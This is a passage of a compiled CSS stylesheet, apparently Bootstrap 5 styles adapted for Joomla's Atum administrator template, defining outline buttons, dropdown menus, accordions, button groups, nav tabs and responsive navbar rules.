.btn-check:checked + .btn-outline-secondary, .btn-check:active + .btn-outline-secondary, .btn-outline-secondary:active, .btn-outline-secondary.active, .btn-outline-secondary.dropdown-toggle.show {
  color: #fff;
  background-color: #495057;
  border-color: #495057;
}
.btn-check:checked + .btn-outline-secondary:focus, .btn-check:active + .btn-outline-secondary:focus, .btn-outline-secondary:active:focus, .btn-outline-secondary.active:focus, .btn-outline-secondary.dropdown-toggle.show:focus {
  box-shadow: 0 0 0 0.25rem rgba(73, 80, 87, 0.5);
}
.btn-outline-secondary:disabled, .btn-outline-secondary.disabled {
  color: #495057;
  background-color: transparent;
}

.btn-outline-success {
  color: #457d54;
  border-color: #457d54;
}
.btn-outline-success:hover {
  color: #fff;
  background-color: #457d54;
  border-color: #457d54;
}
.btn-check:focus + .btn-outline-success, .btn-outline-success:focus {
  box-shadow: 0 0 0 0.25rem rgba(69, 125, 84, 0.5);
}
.btn-check:checked + .btn-outline-success, .btn-check:active + .btn-outline-success, .btn-outline-success:active, .btn-outline-success.active, .btn-outline-success.dropdown-toggle.show {
  color: #fff;
  background-color: #457d54;
  border-color: #457d54;
}
.btn-check:checked + .btn-outline-success:focus, .btn-check:active + .btn-outline-success:focus, .btn-outline-success:active:focus, .btn-outline-success.active:focus, .btn-outline-success.dropdown-toggle.show:focus {
  box-shadow: 0 0 0 0.25rem rgba(69, 125, 84, 0.5);
}
.btn-outline-success:disabled, .btn-outline-success.disabled {
  color: #457d54;
  background-color: transparent;
}

.btn-outline-info {
  color: #2a69b8;
  border-color: #2a69b8;
}
.btn-outline-info:hover {
  color: #fff;
  background-color: #2a69b8;
  border-color: #2a69b8;
}
.btn-check:focus + .btn-outline-info, .btn-outline-info:focus {
  box-shadow: 0 0 0 0.25rem rgba(42, 105, 184, 0.5);
}
.btn-check:checked + .btn-outline-info, .btn-check:active + .btn-outline-info, .btn-outline-info:active, .btn-outline-info.active, .btn-outline-info.dropdown-toggle.show {
  color: #fff;
  background-color: #2a69b8;
  border-color: #2a69b8;
}
.btn-check:checked + .btn-outline-info:focus, .btn-check:active + .btn-outline-info:focus, .btn-outline-info:active:focus, .btn-outline-info.active:focus, .btn-outline-info.dropdown-toggle.show:focus {
  box-shadow: 0 0 0 0.25rem rgba(42, 105, 184, 0.5);
}
.btn-outline-info:disabled, .btn-outline-info.disabled {
  color: #2a69b8;
  background-color: transparent;
}

.btn-outline-warning {
  color: #ffb514;
  border-color: #ffb514;
}
.btn-outline-warning:hover {
  color: #000;
  background-color: #ffb514;
  border-color: #ffb514;
}
.btn-check:focus + .btn-outline-warning, .btn-outline-warning:focus {
  box-shadow: 0 0 0 0.25rem rgba(255, 181, 20, 0.5);
}
.btn-check:checked + .btn-outline-warning, .btn-check:active + .btn-outline-warning, .btn-outline-warning:active, .btn-outline-warning.active, .btn-outline-warning.dropdown-toggle.show {
  color: #000;
  background-color: #ffb514;
  border-color: #ffb514;
}
.btn-check:checked + .btn-outline-warning:focus, .btn-check:active + .btn-outline-warning:focus, .btn-outline-warning:active:focus, .btn-outline-warning.active:focus, .btn-outline-warning.dropdown-toggle.show:focus {
  box-shadow: 0 0 0 0.25rem rgba(255, 181, 20, 0.5);
}
.btn-outline-warning:disabled, .btn-outline-warning.disabled {
  color: #ffb514;
  background-color: transparent;
}

.btn-outline-danger {
  color: #c52827;
  border-color: #c52827;
}
.btn-outline-danger:hover {
  color: #fff;
  background-color: #c52827;
  border-color: #c52827;
}
.btn-check:focus + .btn-outline-danger, .btn-outline-danger:focus {
  box-shadow: 0 0 0 0.25rem rgba(197, 40, 39, 0.5);
}
.btn-check:checked + .btn-outline-danger, .btn-check:active + .btn-outline-danger, .btn-outline-danger:active, .btn-outline-danger.active, .btn-outline-danger.dropdown-toggle.show {
  color: #fff;
  background-color: #c52827;
  border-color: #c52827;
}
.btn-check:checked + .btn-outline-danger:focus, .btn-check:active + .btn-outline-danger:focus, .btn-outline-danger:active:focus, .btn-outline-danger.active:focus, .btn-outline-danger.dropdown-toggle.show:focus {
  box-shadow: 0 0 0 0.25rem rgba(197, 40, 39, 0.5);
}
.btn-outline-danger:disabled, .btn-outline-danger.disabled {
  color: #c52827;
  background-color: transparent;
}

.btn-outline-light {
  color: #f8f9fa;
  border-color: #f8f9fa;
}
.btn-outline-light:hover {
  color: #000;
  background-color: #f8f9fa;
  border-color: #f8f9fa;
}
.btn-check:focus + .btn-outline-light, .btn-outline-light:focus {
  box-shadow: 0 0 0 0.25rem rgba(248, 249, 250, 0.5);
}
.btn-check:checked + .btn-outline-light, .btn-check:active + .btn-outline-light, .btn-outline-light:active, .btn-outline-light.active, .btn-outline-light.dropdown-toggle.show {
  color: #000;
  background-color: #f8f9fa;
  border-color: #f8f9fa;
}
.btn-check:checked + .btn-outline-light:focus, .btn-check:active + .btn-outline-light:focus, .btn-outline-light:active:focus, .btn-outline-light.active:focus, .btn-outline-light.dropdown-toggle.show:focus {
  box-shadow: 0 0 0 0.25rem rgba(248, 249, 250, 0.5);
}
.btn-outline-light:disabled, .btn-outline-light.disabled {
  color: #f8f9fa;
  background-color: transparent;
}

.btn-outline-dark {
  color: #212529;
  border-color: #212529;
}
.btn-outline-dark:hover {
  color: #fff;
  background-color: #212529;
  border-color: #212529;
}
.btn-check:focus + .btn-outline-dark, .btn-outline-dark:focus {
  box-shadow: 0 0 0 0.25rem rgba(33, 37, 41, 0.5);
}
.btn-check:checked + .btn-outline-dark, .btn-check:active + .btn-outline-dark, .btn-outline-dark:active, .btn-outline-dark.active, .btn-outline-dark.dropdown-toggle.show {
  color: #fff;
  background-color: #212529;
  border-color: #212529;
}
.btn-check:checked + .btn-outline-dark:focus, .btn-check:active + .btn-outline-dark:focus, .btn-outline-dark:active:focus, .btn-outline-dark.active:focus, .btn-outline-dark.dropdown-toggle.show:focus {
  box-shadow: 0 0 0 0.25rem rgba(33, 37, 41, 0.5);
}
.btn-outline-dark:disabled, .btn-outline-dark.disabled {
  color: #212529;
  background-color: transparent;
}

.btn-outline-atum-link-color {
  color: #2a69b8;
  border-color: #2a69b8;
}
.btn-outline-atum-link-color:hover {
  color: #fff;
  background-color: #2a69b8;
  border-color: #2a69b8;
}
.btn-check:focus + .btn-outline-atum-link-color, .btn-outline-atum-link-color:focus {
  box-shadow: 0 0 0 0.25rem rgba(42, 105, 184, 0.5);
}
.btn-check:checked + .btn-outline-atum-link-color, .btn-check:active + .btn-outline-atum-link-color, .btn-outline-atum-link-color:active, .btn-outline-atum-link-color.active, .btn-outline-atum-link-color.dropdown-toggle.show {
  color: #fff;
  background-color: #2a69b8;
  border-color: #2a69b8;
}
.btn-check:checked + .btn-outline-atum-link-color:focus, .btn-check:active + .btn-outline-atum-link-color:focus, .btn-outline-atum-link-color:active:focus, .btn-outline-atum-link-color.active:focus, .btn-outline-atum-link-color.dropdown-toggle.show:focus {
  box-shadow: 0 0 0 0.25rem rgba(42, 105, 184, 0.5);
}
.btn-outline-atum-link-color:disabled, .btn-outline-atum-link-color.disabled {
  color: #2a69b8;
  background-color: transparent;
}

.btn-outline-atum-text-dark {
  color: #495057;
  border-color: #495057;
}
.btn-outline-atum-text-dark:hover {
  color: #fff;
  background-color: #495057;
  border-color: #495057;
}
.btn-check:focus + .btn-outline-atum-text-dark, .btn-outline-atum-text-dark:focus {
  box-shadow: 0 0 0 0.25rem rgba(73, 80, 87, 0.5);
}
.btn-check:checked + .btn-outline-atum-text-dark, .btn-check:active + .btn-outline-atum-text-dark, .btn-outline-atum-text-dark:active, .btn-outline-atum-text-dark.active, .btn-outline-atum-text-dark.dropdown-toggle.show {
  color: #fff;
  background-color: #495057;
  border-color: #495057;
}
.btn-check:checked + .btn-outline-atum-text-dark:focus, .btn-check:active + .btn-outline-atum-text-dark:focus, .btn-outline-atum-text-dark:active:focus, .btn-outline-atum-text-dark.active:focus, .btn-outline-atum-text-dark.dropdown-toggle.show:focus {
  box-shadow: 0 0 0 0.25rem rgba(73, 80, 87, 0.5);
}
.btn-outline-atum-text-dark:disabled, .btn-outline-atum-text-dark.disabled {
  color: #495057;
  background-color: transparent;
}

.btn-outline-action {
  color: #132f53;
  border-color: #132f53;
}
.btn-outline-action:hover {
  color: #fff;
  background-color: #132f53;
  border-color: #132f53;
}
.btn-check:focus + .btn-outline-action, .btn-outline-action:focus {
  box-shadow: 0 0 0 0.25rem rgba(19, 47, 83, 0.5);
}
.btn-check:checked + .btn-outline-action, .btn-check:active + .btn-outline-action, .btn-outline-action:active, .btn-outline-action.active, .btn-outline-action.dropdown-toggle.show {
  color: #fff;
  background-color: #132f53;
  border-color: #132f53;
}
.btn-check:checked + .btn-outline-action:focus, .btn-check:active + .btn-outline-action:focus, .btn-outline-action:active:focus, .btn-outline-action.active:focus, .btn-outline-action.dropdown-toggle.show:focus {
  box-shadow: 0 0 0 0.25rem rgba(19, 47, 83, 0.5);
}
.btn-outline-action:disabled, .btn-outline-action.disabled {
  color: #132f53;
  background-color: transparent;
}

.btn-outline-error {
  color: #3b0d0c;
  border-color: #3b0d0c;
}
.btn-outline-error:hover {
  color: #fff;
  background-color: #3b0d0c;
  border-color: #3b0d0c;
}
.btn-check:focus + .btn-outline-error, .btn-outline-error:focus {
  box-shadow: 0 0 0 0.25rem rgba(59, 13, 12, 0.5);
}
.btn-check:checked + .btn-outline-error, .btn-check:active + .btn-outline-error, .btn-outline-error:active, .btn-outline-error.active, .btn-outline-error.dropdown-toggle.show {
  color: #fff;
  background-color: #3b0d0c;
  border-color: #3b0d0c;
}
.btn-check:checked + .btn-outline-error:focus, .btn-check:active + .btn-outline-error:focus, .btn-outline-error:active:focus, .btn-outline-error.active:focus, .btn-outline-error.dropdown-toggle.show:focus {
  box-shadow: 0 0 0 0.25rem rgba(59, 13, 12, 0.5);
}
.btn-outline-error:disabled, .btn-outline-error.disabled {
  color: #3b0d0c;
  background-color: transparent;
}

.btn-outline-alert-success {
  color: #0f2f21;
  border-color: #0f2f21;
}
.btn-outline-alert-success:hover {
  color: #fff;
  background-color: #0f2f21;
  border-color: #0f2f21;
}
.btn-check:focus + .btn-outline-alert-success, .btn-outline-alert-success:focus {
  box-shadow: 0 0 0 0.25rem rgba(15, 47, 33, 0.5);
}
.btn-check:checked + .btn-outline-alert-success, .btn-check:active + .btn-outline-alert-success, .btn-outline-alert-success:active, .btn-outline-alert-success.active, .btn-outline-alert-success.dropdown-toggle.show {
  color: #fff;
  background-color: #0f2f21;
  border-color: #0f2f21;
}
.btn-check:checked + .btn-outline-alert-success:focus, .btn-check:active + .btn-outline-alert-success:focus, .btn-outline-alert-success:active:focus, .btn-outline-alert-success.active:focus, .btn-outline-alert-success.dropdown-toggle.show:focus {
  box-shadow: 0 0 0 0.25rem rgba(15, 47, 33, 0.5);
}
.btn-outline-alert-success:disabled, .btn-outline-alert-success.disabled {
  color: #0f2f21;
  background-color: transparent;
}

.btn-link {
  font-weight: 400;
  color: var(--template-link-color);
  text-decoration: none;
}
.btn-link:hover {
  color: var(--template-link-hover-color);
}
.btn-link:disabled, .btn-link.disabled {
  color: #666e76;
}

.btn-lg, .btn-group-lg > .btn {
  padding: 0.5rem 1rem;
  font-size: 1.25rem;
  border-radius: 0.3rem;
}

.btn-sm, .btn-group-sm > .btn {
  padding: 0.25rem 0.5rem;
  font-size: 0.8rem;
  border-radius: 0.2rem;
}

.fade {
  transition: opacity 0.15s linear;
}
@media (prefers-reduced-motion: reduce) {
  .fade {
    transition: none;
  }
}
.fade:not(.show) {
  opacity: 0;
}

.collapse:not(.show) {
  display: none;
}

.collapsing {
  height: 0;
  overflow: hidden;
  transition: height 0.35s ease;
}
@media (prefers-reduced-motion: reduce) {
  .collapsing {
    transition: none;
  }
}

.dropup,
.dropend,
.dropdown,
.dropstart {
  position: relative;
}

.dropdown-toggle {
  white-space: nowrap;
}
.dropdown-toggle::after {
  display: inline-block;
  margin-left: 0.255em;
  vertical-align: 0.255em;
  content: "";
  border-top: 0.3em solid;
  border-right: 0.3em solid transparent;
  border-bottom: 0;
  border-left: 0.3em solid transparent;
}
.dropdown-toggle:empty::after {
  margin-left: 0;
}

.dropdown-menu {
  position: absolute;
  z-index: 1000;
  display: none;
  min-width: 10rem;
  padding: 0 0;
  margin: 0;
  font-size: 1rem;
  color: var(--template-text-dark);
  text-align: left;
  list-style: none;
  background-color: #fff;
  background-clip: padding-box;
  border: 1px solid rgba(0, 0, 0, 0.15);
  border-radius: 0.25rem;
}
.dropdown-menu[data-bs-popper] {
  top: 100%;
  left: 0;
  margin-top: 0;
}

.dropdown-menu-start {
  --bs-position: start;
}
.dropdown-menu-start[data-bs-popper] {
  right: auto;
  left: 0;
}

.dropdown-menu-end {
  --bs-position: end;
}
.dropdown-menu-end[data-bs-popper] {
  right: 0;
  left: auto;
}

@media (min-width: 576px) {
  .dropdown-menu-sm-start {
    --bs-position: start;
  }
  .dropdown-menu-sm-start[data-bs-popper] {
    right: auto;
    left: 0;
  }

  .dropdown-menu-sm-end {
    --bs-position: end;
  }
  .dropdown-menu-sm-end[data-bs-popper] {
    right: 0;
    left: auto;
  }
}
@media (min-width: 768px) {
  .dropdown-menu-md-start {
    --bs-position: start;
  }
  .dropdown-menu-md-start[data-bs-popper] {
    right: auto;
    left: 0;
  }

  .dropdown-menu-md-end {
    --bs-position: end;
  }
  .dropdown-menu-md-end[data-bs-popper] {
    right: 0;
    left: auto;
  }
}
@media (min-width: 992px) {
  .dropdown-menu-lg-start {
    --bs-position: start;
  }
  .dropdown-menu-lg-start[data-bs-popper] {
    right: auto;
    left: 0;
  }

  .dropdown-menu-lg-end {
    --bs-position: end;
  }
  .dropdown-menu-lg-end[data-bs-popper] {
    right: 0;
    left: auto;
  }
}
@media (min-width: 1200px) {
  .dropdown-menu-xl-start {
    --bs-position: start;
  }
  .dropdown-menu-xl-start[data-bs-popper] {
    right: auto;
    left: 0;
  }

  .dropdown-menu-xl-end {
    --bs-position: end;
  }
  .dropdown-menu-xl-end[data-bs-popper] {
    right: 0;
    left: auto;
  }
}
@media (min-width: 1400px) {
  .dropdown-menu-xxl-start {
    --bs-position: start;
  }
  .dropdown-menu-xxl-start[data-bs-popper] {
    right: auto;
    left: 0;
  }

  .dropdown-menu-xxl-end {
    --bs-position: end;
  }
  .dropdown-menu-xxl-end[data-bs-popper] {
    right: 0;
    left: auto;
  }
}
.dropup .dropdown-menu[data-bs-popper] {
  top: auto;
  bottom: 100%;
  margin-top: 0;
  margin-bottom: 0;
}
.dropup .dropdown-toggle::after {
  display: inline-block;
  margin-left: 0.255em;
  vertical-align: 0.255em;
  content: "";
  border-top: 0;
  border-right: 0.3em solid transparent;
  border-bottom: 0.3em solid;
  border-left: 0.3em solid transparent;
}
.dropup .dropdown-toggle:empty::after {
  margin-left: 0;
}

.dropend .dropdown-menu[data-bs-popper] {
  top: 0;
  right: auto;
  left: 100%;
  margin-top: 0;
  margin-left: 0;
}
.dropend .dropdown-toggle::after {
  display: inline-block;
  margin-left: 0.255em;
  vertical-align: 0.255em;
  content: "";
  border-top: 0.3em solid transparent;
  border-right: 0;
  border-bottom: 0.3em solid transparent;
  border-left: 0.3em solid;
}
.dropend .dropdown-toggle:empty::after {
  margin-left: 0;
}
.dropend .dropdown-toggle::after {
  vertical-align: 0;
}

.dropstart .dropdown-menu[data-bs-popper] {
  top: 0;
  right: 100%;
  left: auto;
  margin-top: 0;
  margin-right: 0;
}
.dropstart .dropdown-toggle::after {
  display: inline-block;
  margin-left: 0.255em;
  vertical-align: 0.255em;
  content: "";
}
.dropstart .dropdown-toggle::after {
  display: none;
}
.dropstart .dropdown-toggle::before {
  display: inline-block;
  margin-right: 0.255em;
  vertical-align: 0.255em;
  content: "";
  border-top: 0.3em solid transparent;
  border-right: 0.3em solid;
  border-bottom: 0.3em solid transparent;
}
.dropstart .dropdown-toggle:empty::after {
  margin-left: 0;
}
.dropstart .dropdown-toggle::before {
  vertical-align: 0;
}

.dropdown-divider {
  height: 0;
  margin: 0.5rem 0;
  overflow: hidden;
  border-top: 1px solid rgba(0, 0, 0, 0.15);
}

.dropdown-item {
  display: block;
  width: 100%;
  padding: 0.5rem 0.75rem;
  clear: both;
  font-weight: 400;
  color: #212529;
  text-align: inherit;
  white-space: nowrap;
  background-color: transparent;
  border: 0;
}
.dropdown-item:first-child {
  border-top-left-radius: calc(0.25rem - 1px);
  border-top-right-radius: calc(0.25rem - 1px);
}
.dropdown-item:last-child {
  border-bottom-right-radius: calc(0.25rem - 1px);
  border-bottom-left-radius: calc(0.25rem - 1px);
}
.dropdown-item:hover, .dropdown-item:focus {
  color: var(--template-text-dark);
  background-color: #e8e8e8;
}
.dropdown-item.active, .dropdown-item:active {
  color: #fff;
  text-decoration: none;
  background-color: #2a69b7;
}
.dropdown-item.disabled, .dropdown-item:disabled {
  color: #adb5bd;
  pointer-events: none;
  background-color: transparent;
}

.dropdown-menu.show {
  display: block;
}

.dropdown-header {
  display: block;
  padding: 0 0.75rem;
  margin-bottom: 0;
  font-size: 0.8rem;
  color: #666e76;
  white-space: nowrap;
}

.dropdown-item-text {
  display: block;
  padding: 0.5rem 0.75rem;
  color: #212529;
}

.dropdown-menu-dark {
  color: #dee2e6;
  background-color: #343a40;
  border-color: rgba(0, 0, 0, 0.15);
}
.dropdown-menu-dark .dropdown-item {
  color: #dee2e6;
}
.dropdown-menu-dark .dropdown-item:hover, .dropdown-menu-dark .dropdown-item:focus {
  color: #fff;
  background-color: rgba(255, 255, 255, 0.15);
}
.dropdown-menu-dark .dropdown-item.active, .dropdown-menu-dark .dropdown-item:active {
  color: #fff;
  background-color: #2a69b7;
}
.dropdown-menu-dark .dropdown-item.disabled, .dropdown-menu-dark .dropdown-item:disabled {
  color: #adb5bd;
}
.dropdown-menu-dark .dropdown-divider {
  border-color: rgba(0, 0, 0, 0.15);
}
.dropdown-menu-dark .dropdown-item-text {
  color: #dee2e6;
}
.dropdown-menu-dark .dropdown-header {
  color: #adb5bd;
}

.accordion-button {
  position: relative;
  display: flex;
  align-items: center;
  width: 100%;
  padding: 1rem 1.25rem;
  font-size: 1rem;
  color: var(--template-text-dark);
  text-align: left;
  background-color: #fff;
  border: 0;
  border-radius: 0;
  overflow-anchor: none;
  transition: color 0.15s ease-in-out, background-color 0.15s ease-in-out, border-color 0.15s ease-in-out, box-shadow 0.15s ease-in-out, border-radius 0.15s ease;
}
@media (prefers-reduced-motion: reduce) {
  .accordion-button {
    transition: none;
  }
}
.accordion-button:not(.collapsed) {
  color: #265fa5;
  background-color: #eaf0f8;
  box-shadow: inset 0 -1px 0 rgba(0, 0, 0, 0.125);
}
.accordion-button:not(.collapsed)::after {
  background-image: url("data:image/svg+xml,%3csvg xmlns='http://www.w3.org/2000/svg' viewBox='0 0 16 16' fill='%23265fa5'%3e%3cpath fill-rule='evenodd' d='M1.646 4.646a.5.5 0 0 1 .708 0L8 10.293l5.646-5.647a.5.5 0 0 1 .708.708l-6 6a.5.5 0 0 1-.708 0l-6-6a.5.5 0 0 1 0-.708z'/%3e%3c/svg%3e");
  -webkit-transform: rotate(-180deg);
          transform: rotate(-180deg);
}
.accordion-button::after {
  flex-shrink: 0;
  width: 1.25rem;
  height: 1.25rem;
  margin-left: auto;
  content: "";
  background-image: url("data:image/svg+xml,%3csvg xmlns='http://www.w3.org/2000/svg' viewBox='0 0 16 16' fill='var%28--template-text-dark%29'%3e%3cpath fill-rule='evenodd' d='M1.646 4.646a.5.5 0 0 1 .708 0L8 10.293l5.646-5.647a.5.5 0 0 1 .708.708l-6 6a.5.5 0 0 1-.708 0l-6-6a.5.5 0 0 1 0-.708z'/%3e%3c/svg%3e");
  background-repeat: no-repeat;
  background-size: 1.25rem;
  transition: -webkit-transform 0.2s ease-in-out;
  transition: transform 0.2s ease-in-out;
  transition: transform 0.2s ease-in-out, -webkit-transform 0.2s ease-in-out;
}
@media (prefers-reduced-motion: reduce) {
  .accordion-button::after {
    transition: none;
  }
}
.accordion-button:hover {
  z-index: 2;
}
.accordion-button:focus {
  z-index: 3;
  border-color: #95b4db;
  outline: 0;
  box-shadow: 0 0 0 0.25rem rgba(42, 105, 183, 0.25);
}

.accordion-header {
  margin-bottom: 0;
}

.accordion-item {
  background-color: #fff;
  border: 1px solid rgba(0, 0, 0, 0.125);
}
.accordion-item:first-of-type {
  border-top-left-radius: 0.25rem;
  border-top-right-radius: 0.25rem;
}
.accordion-item:first-of-type .accordion-button {
  border-top-left-radius: calc(0.25rem - 1px);
  border-top-right-radius: calc(0.25rem - 1px);
}
.accordion-item:not(:first-of-type) {
  border-top: 0;
}
.accordion-item:last-of-type {
  border-bottom-right-radius: 0.25rem;
  border-bottom-left-radius: 0.25rem;
}
.accordion-item:last-of-type .accordion-button.collapsed {
  border-bottom-right-radius: calc(0.25rem - 1px);
  border-bottom-left-radius: calc(0.25rem - 1px);
}
.accordion-item:last-of-type .accordion-collapse {
  border-bottom-right-radius: 0.25rem;
  border-bottom-left-radius: 0.25rem;
}

.accordion-body {
  padding: 1rem 1.25rem;
}

.accordion-flush .accordion-collapse {
  border-width: 0;
}
.accordion-flush .accordion-item {
  border-right: 0;
  border-left: 0;
  border-radius: 0;
}
.accordion-flush .accordion-item:first-child {
  border-top: 0;
}
.accordion-flush .accordion-item:last-child {
  border-bottom: 0;
}
.accordion-flush .accordion-item .accordion-button {
  border-radius: 0;
}

.btn-group,
.btn-group-vertical {
  position: relative;
  display: inline-flex;
  vertical-align: middle;
}
.btn-group > .btn,
.btn-group-vertical > .btn {
  position: relative;
  flex: 1 1 auto;
}
.btn-group > .btn-check:checked + .btn,
.btn-group > .btn-check:focus + .btn,
.btn-group > .btn:hover,
.btn-group > .btn:focus,
.btn-group > .btn:active,
.btn-group > .btn.active,
.btn-group-vertical > .btn-check:checked + .btn,
.btn-group-vertical > .btn-check:focus + .btn,
.btn-group-vertical > .btn:hover,
.btn-group-vertical > .btn:focus,
.btn-group-vertical > .btn:active,
.btn-group-vertical > .btn.active {
  z-index: 1;
}

.btn-toolbar {
  display: flex;
  flex-wrap: wrap;
  justify-content: flex-start;
}
.btn-toolbar .input-group {
  width: auto;
}

.btn-group > .btn:not(:first-child),
.btn-group > .btn-group:not(:first-child) {
  margin-left: -1px;
}
.btn-group > .btn:not(:last-child):not(.dropdown-toggle),
.btn-group > .btn-group:not(:last-child) > .btn {
  border-top-right-radius: 0;
  border-bottom-right-radius: 0;
}
.btn-group > .btn:nth-child(n+3),
.btn-group > :not(.btn-check) + .btn,
.btn-group > .btn-group:not(:first-child) > .btn {
  border-top-left-radius: 0;
  border-bottom-left-radius: 0;
}

.dropdown-toggle-split {
  padding-right: 0.75rem;
  padding-left: 0.75rem;
}
.dropdown-toggle-split::after, .dropup .dropdown-toggle-split::after, .dropend .dropdown-toggle-split::after {
  margin-left: 0;
}
.dropstart .dropdown-toggle-split::before {
  margin-right: 0;
}

.btn-sm + .dropdown-toggle-split, .btn-group-sm > .btn + .dropdown-toggle-split {
  padding-right: 0.375rem;
  padding-left: 0.375rem;
}

.btn-lg + .dropdown-toggle-split, .btn-group-lg > .btn + .dropdown-toggle-split {
  padding-right: 0.75rem;
  padding-left: 0.75rem;
}

.btn-group-vertical {
  flex-direction: column;
  align-items: flex-start;
  justify-content: center;
}
.btn-group-vertical > .btn,
.btn-group-vertical > .btn-group {
  width: 100%;
}
.btn-group-vertical > .btn:not(:first-child),
.btn-group-vertical > .btn-group:not(:first-child) {
  margin-top: -1px;
}
.btn-group-vertical > .btn:not(:last-child):not(.dropdown-toggle),
.btn-group-vertical > .btn-group:not(:last-child) > .btn {
  border-bottom-right-radius: 0;
  border-bottom-left-radius: 0;
}
.btn-group-vertical > .btn ~ .btn,
.btn-group-vertical > .btn-group:not(:first-child) > .btn {
  border-top-left-radius: 0;
  border-top-right-radius: 0;
}

.nav {
  display: flex;
  flex-wrap: wrap;
  padding-left: 0;
  margin-bottom: 0;
  list-style: none;
}

.nav-link {
  display: block;
  padding: 0.5rem 1rem;
  color: var(--template-link-color);
  transition: color 0.15s ease-in-out, background-color 0.15s ease-in-out, border-color 0.15s ease-in-out;
}
@media (prefers-reduced-motion: reduce) {
  .nav-link {
    transition: none;
  }
}
.nav-link:hover, .nav-link:focus {
  color: var(--template-link-hover-color);
}
.nav-link.disabled {
  color: #666e76;
  pointer-events: none;
  cursor: default;
}

.nav-tabs {
  border-bottom: 1px solid #dee2e6;
}
.nav-tabs .nav-link {
  margin-bottom: -1px;
  background: none;
  border: 1px solid transparent;
  border-top-left-radius: 0.25rem;
  border-top-right-radius: 0.25rem;
}
.nav-tabs .nav-link:hover, .nav-tabs .nav-link:focus {
  border-color: #e8e8e8 #e8e8e8 #dee2e6;
  isolation: isolate;
}
.nav-tabs .nav-link.disabled {
  color: #666e76;
  background-color: transparent;
  border-color: transparent;
}
.nav-tabs .nav-link.active,
.nav-tabs .nav-item.show .nav-link {
  color: #495057;
  background-color: #fff;
  border-color: #dee2e6 #dee2e6 #fff;
}
.nav-tabs .dropdown-menu {
  margin-top: -1px;
  border-top-left-radius: 0;
  border-top-right-radius: 0;
}

.nav-pills .nav-link {
  background: none;
  border: 0;
  border-radius: 0.25rem;
}
.nav-pills .nav-link.active,
.nav-pills .show > .nav-link {
  color: #fff;
  background-color: #2a69b7;
}

.nav-fill > .nav-link,
.nav-fill .nav-item {
  flex: 1 1 auto;
  text-align: center;
}

.nav-justified > .nav-link,
.nav-justified .nav-item {
  flex-basis: 0;
  flex-grow: 1;
  text-align: center;
}

.nav-fill .nav-item .nav-link,
.nav-justified .nav-item .nav-link {
  width: 100%;
}

.tab-content > .tab-pane {
  display: none;
}
.tab-content > .active {
  display: block;
}

.navbar {
  position: relative;
  display: flex;
  flex-wrap: wrap;
  align-items: center;
  justify-content: space-between;
  padding-top: 0.5rem;
  padding-bottom: 0.5rem;
}
.navbar > .container,
.navbar > .container-fluid,
.navbar > .container-sm,
.navbar > .container-md,
.navbar > .container-lg,
.navbar > .container-xl,
.navbar > .container-xxl {
  display: flex;
  flex-wrap: inherit;
  align-items: center;
  justify-content: space-between;
}
.navbar-brand {
  padding-top: 0.3125rem;
  padding-bottom: 0.3125rem;
  margin-right: 1rem;
  font-size: 1.25rem;
  white-space: nowrap;
}
.navbar-nav {
  display: flex;
  flex-direction: column;
  padding-left: 0;
  margin-bottom: 0;
  list-style: none;
}
.navbar-nav .nav-link {
  padding-right: 0;
  padding-left: 0;
}
.navbar-nav .dropdown-menu {
  position: static;
}

.navbar-text {
  padding-top: 0.5rem;
  padding-bottom: 0.5rem;
}

.navbar-collapse {
  flex-basis: 100%;
  flex-grow: 1;
  align-items: center;
}

.navbar-toggler {
  padding: 0.25rem 0.75rem;
  font-size: 1.25rem;
  line-height: 1;
  background-color: transparent;
  border: 1px solid transparent;
  border-radius: 0.25rem;
  transition: box-shadow 0.15s ease-in-out;
}
@media (prefers-reduced-motion: reduce) {
  .navbar-toggler {
    transition: none;
  }
}
.navbar-toggler:hover {
  text-decoration: none;
}
.navbar-toggler:focus {
  text-decoration: none;
  outline: 0;
  box-shadow: 0 0 0 0.25rem;
}

.navbar-toggler-icon {
  display: inline-block;
  width: 1.5em;
  height: 1.5em;
  vertical-align: middle;
  background-repeat: no-repeat;
  background-position: center;
  background-size: 100%;
}

.navbar-nav-scroll {
  max-height: var(--scroll-height, 75vh);
  overflow-y: auto;
}

@media (min-width: 576px) {
  .navbar-expand-sm {
    flex-wrap: nowrap;
    justify-content: flex-start;
  }
  .navbar-expand-sm .navbar-nav {
    flex-direction: row;
  }
  .navbar-expand-sm .navbar-nav .dropdown-menu {
    position: absolute;
  }
  .navbar-expand-sm .navbar-nav .nav-link {
    padding-right: 0.5rem;
    padding-left: 0.5rem;
  }
  .navbar-expand-sm .navbar-nav-scroll {
    overflow: visible;
  }
  .navbar-expand-sm .navbar-collapse {
    display: flex !important;
    flex-basis: auto;
  }
  .navbar-expand-sm .navbar-toggler {
    display: none;
  }
}
@media (min-width: 768px) {
  .navbar-expand-md {
    flex-wrap: nowrap;
    justify-content: flex-start;
  }
  .navbar-expand-md .navbar-nav {
    flex-direction: row;
  }
  .navbar-expand-md .navbar-nav .dropdown-menu {
    position: absolute;
  }
  .navbar-expand-md .navbar-nav .nav-link {
    padding-right: 0.5rem;
    padding-left: 0.5rem;
  }
  .navbar-expand-md .navbar-nav-scroll {
    overflow: visible;
  }
  .navbar-expand-md .navbar-collapse {
    display: flex !important;
    flex-basis: auto;
  }
  .navbar-expand-md .navbar-toggler {
    display: none;
  }
}
@media (min-width: 992px) {
  .navbar-expand-lg {
    flex-wrap: nowrap;
    justify-content: flex-start;
  }
  .navbar-expand-lg .navbar-nav {
    flex-direction: row;
  }
  .navbar-expand-lg .navbar-nav .dropdown-menu {
    position: absolute;
  }
  .navbar-expand-lg .navbar-nav .nav-link {
    padding-right: 0.5rem;
    padding-left: 0.5rem;
  }
  .navbar-expand-lg .navbar-nav-scroll {
    overflow: visible;
  }
  .navbar-expand-lg .navbar-collapse {
    display: flex !important;
    flex-basis: auto;
  }
  .navbar-expand-lg .navbar-toggler {
    display: none;
  }
}
@media (min-width: 1200px) {
  .navbar-expand-xl {
    flex-wrap: nowrap;
    justify-content: flex-start;
  }
  .navbar-expand-xl .navbar-nav {
    flex-direction: row;
  }
  .navbar-expand-xl .navbar-nav .dropdown-menu {
    position: absolute;
  }
  .navbar-expand-xl .navbar-nav .nav-link {
    padding-right: 0.5rem;
    padding-left: 0.5rem;
  }
  .navbar-expand-xl .navbar-nav-scroll {
    overflow: visible;
  }
  .navbar-expand-xl .navbar-collapse {
    display: flex !important;
    flex-basis: auto;
  }
  .navbar-expand-xl .navbar-toggler {
    display: none;
  }
}
@media (min-width: 1400px) {
  .navbar-expand-xxl {
    flex-wrap: nowrap;
    justify-content: flex-start;
  }
